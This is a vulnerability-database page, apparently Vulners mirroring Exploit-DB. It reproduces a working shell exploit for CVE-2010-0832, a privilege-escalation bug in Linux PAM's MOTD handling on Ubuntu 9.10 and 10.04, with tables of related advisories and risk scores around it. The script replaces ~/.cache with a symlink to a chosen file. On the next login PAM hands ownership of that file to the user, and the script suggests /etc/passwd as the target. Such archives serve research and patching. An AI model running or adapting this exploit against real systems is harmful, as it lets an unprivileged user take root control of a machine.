Vulners
Lucene search
Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (1)
🗓️ 08 Jul 2010 00:00:00Reported by Kristian Erik HermansenType 
exploitdb🔗 www.exploit-db.com👁 231 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Ubuntu PAM MOTD Local Root Exploit | 12 Jul 201000:00 | – | zdt |
| Ubuntu PAM MOTD File Tampering (Privilege Escalation) | 8 Jul 201000:00 | – | zdt |
 | CVE-2010-0832 | 8 Jul 201000:00 | – | circl |
 | CVE-2010-0832 | 12 Jul 201016:00 | – | cve |
 | CVE-2010-0832 | 12 Jul 201016:00 | – | cvelist |
 | CVE-2010-0832 | 12 Jul 201016:00 | – | debiancve |
| Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2) | 12 Jul 201000:00 | – | exploitdb |
 | EUVD-2010-0857 | 7 Oct 202500:30 | – | euvd |
 | Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (1) | 8 Jul 201000:00 | – | exploitpack |
| Linux PAM 1.1.0 (Ubuntu 9.1010.04) - MOTD File Tampering Privilege Escalation (2) | 12 Jul 201000:00 | – | exploitpack |
10
#!/bin/sh
#
# EDB Note: Updated exploit ~ https://www.exploit-db.com/exploits/14339/
#
# Exploit Title: Ubuntu PAM MOTD file tampering (privilege escalation)
# Date: July 7, 2010
# Author: Kristian Erik Hermansen <[email protected]>
# Software Link: http://packages.ubuntu.com/
# Version: pam-1.1.0
# Tested on: Ubuntu 10.04 LTS (Lucid Lynx)
# CVE : CVE-2010-0832
#
# Notes: Affects Ubuntu 9.10 and 10.04 LTS
# [Patch Instructions]
# $ sudo aptitude -y update; sudo aptitude -y install libpam~n~i
#
if [ $# -eq 0 ]; then
echo "Usage: $0 /path/to/file"
exit 1
fi
mkdir $HOME/backup 2> /dev/null
tmpdir=$(mktemp -d --tmpdir=$HOME/backup/)
mv $HOME/.cache/ $tmpdir 2> /dev/null
echo "\n@@@ File before tampering ...\n"
ls -l $1
ln -sf $1 $HOME/.cache
echo "\n@@@ Now log back into your shell (or re-ssh) to make PAM call vulnerable MOTD code :) File will then be owned by your user. Try /etc/passwd...\n"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jul 2010 00:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 26.9
EPSS0.00278